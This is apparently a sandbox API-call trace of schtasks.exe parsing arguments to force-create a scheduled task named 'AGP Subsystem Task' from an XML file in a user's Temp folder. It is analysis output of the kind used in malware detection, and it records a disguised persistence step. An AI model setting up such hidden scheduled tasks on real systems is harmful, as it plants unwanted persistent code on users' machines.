[0170.382] StrChrIW (lpStart="/f", wMatch=0x3a) returned 0x0
[0170.382] SetLastError (dwErrCode=0x490)
[0170.382] SetLastError (dwErrCode=0x0)
[0170.382] lstrlenW (lpString="/f") returned 2
[0170.382] GetProcessHeap () returned 0x4e0000
[0170.382] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x6) returned 0x4f6968
[0170.382] GetProcessHeap () returned 0x4e0000
[0170.382] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5328
[0170.383] SetLastError (dwErrCode=0x0)
[0170.383] SetLastError (dwErrCode=0x0)
[0170.383] lstrlenW (lpString="/tn") returned 3
[0170.383] lstrlenW (lpString="-/") returned 2
[0170.383] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.383] lstrlenW (lpString="?") returned 1
[0170.383] lstrlenW (lpString="?") returned 1
[0170.383] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.383] lstrlenW (lpString="tn") returned 2
[0170.383] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.383] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|?|") returned 3
[0170.383] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.383] lstrlenW (lpString="|?|") returned 3
[0170.383] lstrlenW (lpString="|tn|") returned 4
[0170.383] SetLastError (dwErrCode=0x490)
[0170.383] lstrlenW (lpString="create") returned 6
[0170.383] lstrlenW (lpString="create") returned 6
[0170.383] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.383] lstrlenW (lpString="tn") returned 2
[0170.383] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.383] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|create|") returned 8
[0170.383] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.383] lstrlenW (lpString="|create|") returned 8
[0170.383] lstrlenW (lpString="|tn|") returned 4
[0170.383] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0
[0170.383] SetLastError (dwErrCode=0x490)
[0170.383] lstrlenW (lpString="delete") returned 6
[0170.383] lstrlenW (lpString="delete") returned 6
[0170.383] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.384] lstrlenW (lpString="tn") returned 2
[0170.384] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.384] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|delete|") returned 8
[0170.384] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.384] lstrlenW (lpString="|delete|") returned 8
[0170.384] lstrlenW (lpString="|tn|") returned 4
[0170.384] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0
[0170.384] SetLastError (dwErrCode=0x490)
[0170.384] lstrlenW (lpString="query") returned 5
[0170.384] lstrlenW (lpString="query") returned 5
[0170.384] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.384] lstrlenW (lpString="tn") returned 2
[0170.384] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.384] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x8, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|query|") returned 7
[0170.384] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.384] lstrlenW (lpString="|query|") returned 7
[0170.384] lstrlenW (lpString="|tn|") returned 4
[0170.384] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0
[0170.384] SetLastError (dwErrCode=0x490)
[0170.384] lstrlenW (lpString="change") returned 6
[0170.384] lstrlenW (lpString="change") returned 6
[0170.384] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.384] lstrlenW (lpString="tn") returned 2
[0170.384] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.384] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|change|") returned 8
[0170.385] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.385] lstrlenW (lpString="|change|") returned 8
[0170.385] lstrlenW (lpString="|tn|") returned 4
[0170.385] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0
[0170.385] SetLastError (dwErrCode=0x490)
[0170.385] lstrlenW (lpString="run") returned 3
[0170.385] lstrlenW (lpString="run") returned 3
[0170.385] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.385] lstrlenW (lpString="tn") returned 2
[0170.385] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.385] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|run|") returned 5
[0170.385] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.385] lstrlenW (lpString="|run|") returned 5
[0170.385] lstrlenW (lpString="|tn|") returned 4
[0170.385] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0
[0170.385] SetLastError (dwErrCode=0x490)
[0170.385] lstrlenW (lpString="end") returned 3
[0170.385] lstrlenW (lpString="end") returned 3
[0170.385] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.385] lstrlenW (lpString="tn") returned 2
[0170.385] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.385] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|end|") returned 5
[0170.385] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.385] lstrlenW (lpString="|end|") returned 5
[0170.385] lstrlenW (lpString="|tn|") returned 4
[0170.385] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0
[0170.385] SetLastError (dwErrCode=0x490)
[0170.385] lstrlenW (lpString="showsid") returned 7
[0170.386] lstrlenW (lpString="showsid") returned 7
[0170.386] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.386] lstrlenW (lpString="tn") returned 2
[0170.386] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.386] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0xa, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|showsid|") returned 9
[0170.386] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.386] lstrlenW (lpString="|showsid|") returned 9
[0170.386] lstrlenW (lpString="|tn|") returned 4
[0170.386] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0
[0170.386] SetLastError (dwErrCode=0x490)
[0170.386] SetLastError (dwErrCode=0x490)
[0170.386] SetLastError (dwErrCode=0x0)
[0170.386] lstrlenW (lpString="/tn") returned 3
[0170.386] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0
[0170.386] SetLastError (dwErrCode=0x490)
[0170.386] SetLastError (dwErrCode=0x0)
[0170.386] lstrlenW (lpString="/tn") returned 3
[0170.386] GetProcessHeap () returned 0x4e0000
[0170.386] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x8) returned 0x4f6978
[0170.386] GetProcessHeap () returned 0x4e0000
[0170.386] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5368
[0170.386] SetLastError (dwErrCode=0x0)
[0170.386] SetLastError (dwErrCode=0x0)
[0170.386] lstrlenW (lpString="AGP Subsystem Task") returned 18
[0170.386] lstrlenW (lpString="-/") returned 2
[0170.386] StrChrIW (lpStart="-/", wMatch=0x41) returned 0x0
[0170.386] SetLastError (dwErrCode=0x490)
[0170.386] SetLastError (dwErrCode=0x490)
[0170.386] SetLastError (dwErrCode=0x0)
[0170.386] lstrlenW (lpString="AGP Subsystem Task") returned 18
[0170.386] StrChrIW (lpStart="AGP Subsystem Task", wMatch=0x3a) returned 0x0
[0170.386] SetLastError (dwErrCode=0x490)
[0170.387] SetLastError (dwErrCode=0x0)
[0170.387] lstrlenW (lpString="AGP Subsystem Task") returned 18
[0170.387] GetProcessHeap () returned 0x4e0000
[0170.387] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x26) returned 0x4f6988
[0170.387] GetProcessHeap () returned 0x4e0000
[0170.387] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5388
[0170.387] SetLastError (dwErrCode=0x0)
[0170.387] SetLastError (dwErrCode=0x0)
[0170.387] lstrlenW (lpString="/xml") returned 4
[0170.387] lstrlenW (lpString="-/") returned 2
[0170.387] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.387] lstrlenW (lpString="?") returned 1
[0170.387] lstrlenW (lpString="?") returned 1
[0170.387] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.387] lstrlenW (lpString="xml") returned 3
[0170.387] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.387] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|?|") returned 3
[0170.387] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.387] lstrlenW (lpString="|?|") returned 3
[0170.387] lstrlenW (lpString="|xml|") returned 5
[0170.387] SetLastError (dwErrCode=0x490)
[0170.387] lstrlenW (lpString="create") returned 6
[0170.387] lstrlenW (lpString="create") returned 6
[0170.387] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.387] lstrlenW (lpString="xml") returned 3
[0170.387] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.387] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|create|") returned 8
[0170.387] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.387] lstrlenW (lpString="|create|") returned 8
[0170.388] lstrlenW (lpString="|xml|") returned 5
[0170.388] StrStrIW (lpFirst="|create|", lpSrch="|xml|") returned 0x0
[0170.388] SetLastError (dwErrCode=0x490)
[0170.388] lstrlenW (lpString="delete") returned 6
[0170.388] lstrlenW (lpString="delete") returned 6
[0170.388] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.388] lstrlenW (lpString="xml") returned 3
[0170.388] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.388] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|delete|") returned 8
[0170.388] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.388] lstrlenW (lpString="|delete|") returned 8
[0170.388] lstrlenW (lpString="|xml|") returned 5
[0170.388] StrStrIW (lpFirst="|delete|", lpSrch="|xml|") returned 0x0
[0170.388] SetLastError (dwErrCode=0x490)
[0170.388] lstrlenW (lpString="query") returned 5
[0170.388] lstrlenW (lpString="query") returned 5
[0170.388] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.388] lstrlenW (lpString="xml") returned 3
[0170.388] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.388] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x8, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|query|") returned 7
[0170.388] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.388] lstrlenW (lpString="|query|") returned 7
[0170.388] lstrlenW (lpString="|xml|") returned 5
[0170.388] StrStrIW (lpFirst="|query|", lpSrch="|xml|") returned 0x0
[0170.388] SetLastError (dwErrCode=0x490)
[0170.388] lstrlenW (lpString="change") returned 6
[0170.388] lstrlenW (lpString="change") returned 6
[0170.388] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.388] lstrlenW (lpString="xml") returned 3
[0170.389] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.389] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|change|") returned 8
[0170.389] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.389] lstrlenW (lpString="|change|") returned 8
[0170.389] lstrlenW (lpString="|xml|") returned 5
[0170.389] StrStrIW (lpFirst="|change|", lpSrch="|xml|") returned 0x0
[0170.389] SetLastError (dwErrCode=0x490)
[0170.389] lstrlenW (lpString="run") returned 3
[0170.389] lstrlenW (lpString="run") returned 3
[0170.389] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.389] lstrlenW (lpString="xml") returned 3
[0170.389] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.389] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|run|") returned 5
[0170.389] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.389] lstrlenW (lpString="|run|") returned 5
[0170.389] lstrlenW (lpString="|xml|") returned 5
[0170.389] StrStrIW (lpFirst="|run|", lpSrch="|xml|") returned 0x0
[0170.389] SetLastError (dwErrCode=0x490)
[0170.389] lstrlenW (lpString="end") returned 3
[0170.389] lstrlenW (lpString="end") returned 3
[0170.389] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.389] lstrlenW (lpString="xml") returned 3
[0170.389] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.389] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|end|") returned 5
[0170.389] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.389] lstrlenW (lpString="|end|") returned 5
[0170.390] lstrlenW (lpString="|xml|") returned 5
[0170.390] StrStrIW (lpFirst="|end|", lpSrch="|xml|") returned 0x0
[0170.390] SetLastError (dwErrCode=0x490)
[0170.390] lstrlenW (lpString="showsid") returned 7
[0170.390] lstrlenW (lpString="showsid") returned 7
[0170.390] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.390] lstrlenW (lpString="xml") returned 3
[0170.390] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.390] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0xa, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|showsid|") returned 9
[0170.390] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.390] lstrlenW (lpString="|showsid|") returned 9
[0170.390] lstrlenW (lpString="|xml|") returned 5
[0170.390] StrStrIW (lpFirst="|showsid|", lpSrch="|xml|") returned 0x0
[0170.390] SetLastError (dwErrCode=0x490)
[0170.390] SetLastError (dwErrCode=0x490)
[0170.390] SetLastError (dwErrCode=0x0)
[0170.390] lstrlenW (lpString="/xml") returned 4
[0170.422] StrChrIW (lpStart="/xml", wMatch=0x3a) returned 0x0
[0170.422] SetLastError (dwErrCode=0x490)
[0170.422] SetLastError (dwErrCode=0x0)
[0170.422] lstrlenW (lpString="/xml") returned 4
[0170.422] GetProcessHeap () returned 0x4e0000
[0170.422] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0xa) returned 0x4f4cc0
[0170.422] GetProcessHeap () returned 0x4e0000
[0170.422] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f53a8
[0170.422] SetLastError (dwErrCode=0x0)
[0170.422] SetLastError (dwErrCode=0x0)
[0170.422] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.422] lstrlenW (lpString="-/") returned 2
[0170.422] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0170.422] SetLastError (dwErrCode=0x490)
[0170.422] SetLastError (dwErrCode=0x490)
[0170.422] SetLastError (dwErrCode=0x0)
[0170.422] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.422] StrChrIW (lpStart="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp", wMatch=0x3a) returned=":\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp"
[0170.422] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.422] GetProcessHeap () returned 0x4e0000
[0170.422] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4cf0
[0170.422] _memicmp (_Buf1=0x4f4cf0, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.422] GetProcessHeap () returned 0x4e0000
[0170.422] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0xc) returned 0x4f4d08
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4d20
[0170.423] _memicmp (_Buf1=0x4f4d20, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x64) returned 0x4f69b8
[0170.423] SetLastError (dwErrCode=0x7a)
[0170.423] SetLastError (dwErrCode=0x0)
[0170.423] SetLastError (dwErrCode=0x0)
[0170.423] lstrlenW (lpString="C") returned 1
[0170.423] SetLastError (dwErrCode=0x490)
[0170.423] SetLastError (dwErrCode=0x0)
[0170.423] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x60) returned 0x4f6a28
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f53c8
[0170.423] SetLastError (dwErrCode=0x0)
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6968) returned 1
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6968) returned 0x6
[0170.423] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6968 | out: hHeap=0x4e0000) returned 1
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5328) returned 1
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5328) returned 0x14
[0170.423] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5328 | out: hHeap=0x4e0000) returned 1
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.424] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6978) returned 1
[0170.424] GetProcessHeap () returned 0x4e0000
[0170.424] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6978) returned 0x8
[0170.424] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6978 | out: hHeap=0x4e0000) returned 1
[0170.424] GetProcessHeap () returned 0x4e0000
[0170.424] GetProcessHeap () returned 0x4e0000
[0170.424] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5368) returned 1
[0170.424] GetProcessHeap () returned 0x4e0000
[0170.424] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5368) returned 0x14
[0170.424] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5368 | out: hHeap=0x4e0000) returned 1
[0170.424] GetProcessHeap () returned 0x4e0000
[0170.424] GetProcessHeap () returned 0x4e0000
[0170.424] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6988) returned 1
[0170.424] GetProcessHeap () returned 0x4e0000
[0170.424] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6988) returned 0x26
[0170.425] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6988 | out: hHeap=0x4e0000) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5388) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5388) returned 0x14
[0170.425] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5388 | out: hHeap=0x4e0000) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4cc0) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4cc0) returned 0xa
[0170.425] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4cc0 | out: hHeap=0x4e0000) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53a8) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f53a8) returned 0x14
[0170.425] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53a8 | out: hHeap=0x4e0000) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6a28) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6a28) returned 0x60
[0170.426] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6a28 | out: hHeap=0x4e0000) returned 1
[0170.426] GetProcessHeap () returned 0x4e0000
[0170.426] GetProcessHeap () returned 0x4e0000
[0170.426] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53c8) returned 1
[0170.426] GetProcessHeap () returned 0x4e0000
[0170.426] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f53c8) returned 0x14
[0170.426] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53c8 | out: hHeap=0x4e0000) returned 1
[0170.426] GetProcessHeap () returned 0x4e0000
[0170.426] GetProcessHeap () returned 0x4e0000
[0170.426] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4ef060) returned 1
[0170.426] GetProcessHeap () returned 0x4e0000
[0170.426] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4ef060) returned 0x10
[0170.426] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4ef060 | out: hHeap=0x4e0000) returned 1
[0170.426] SetLastError (dwErrCode=0x0)
[0170.426] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0170.427] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0170.427] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0170.427] VerifyVersionInfoW (in: lpVersionInformation=0x13cd44, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x13cd44) returned 1
[0170.427] SetLastError (dwErrCode=0x0)
[0170.427] lstrlenW (lpString="create") returned 6
[0170.427] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0
[0170.427] SetLastError (dwErrCode=0x490)
[0170.427] SetLastError (dwErrCode=0x0)
[0170.427] lstrlenW (lpString="create") returned 6
[0170.427] GetProcessHeap () returned 0x4e0000
[0170.427] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f53c8
[0170.427] GetProcessHeap () returned 0x4e0000
[0170.427] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4ef060
[0170.427] _memicmp (_Buf1=0x4ef060, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.427] GetProcessHeap () returned 0x4e0000
[0170.427] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x16) returned 0x4f53a8
[0170.427] SetLastError (dwErrCode=0x0)
[0170.427] _memicmp (_Buf1=0x4f4c18, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.427] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f5a90, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0170.427] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0170.427] GetProcessHeap () returned 0x4e0000
[0170.427] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x74e) returned 0x4f5ca0
[0170.428] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x4f5ca0 | out: lpData=0x4f5ca0) returned 1
[0170.428] VerQueryValueW (in: pBlock=0x4f5ca0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x13ce4c, puLen=0x13ce50 | out: lplpBuffer=0x13ce4c*=0x4f603c, puLen=0x13ce50) returned 1
[0170.428] _memicmp (_Buf1=0x4f4c18, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.428] _vsnwprintf (in: _Buffer=0x4f5a90, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x13ce34 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0170.428] VerQueryValueW (in: pBlock=0x4f5ca0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x13ce5c, puLen=0x13ce58 | out: lplpBuffer=0x13ce5c*=0x4f5e68, puLen=0x13ce58) returned 1
[0170.428] lstrlenW (lpString="schtasks.exe") returned 12
[0170.428] lstrlenW (lpString="schtasks.exe") returned 12
[0170.428] lstrlenW (lpString=".EXE") returned 4
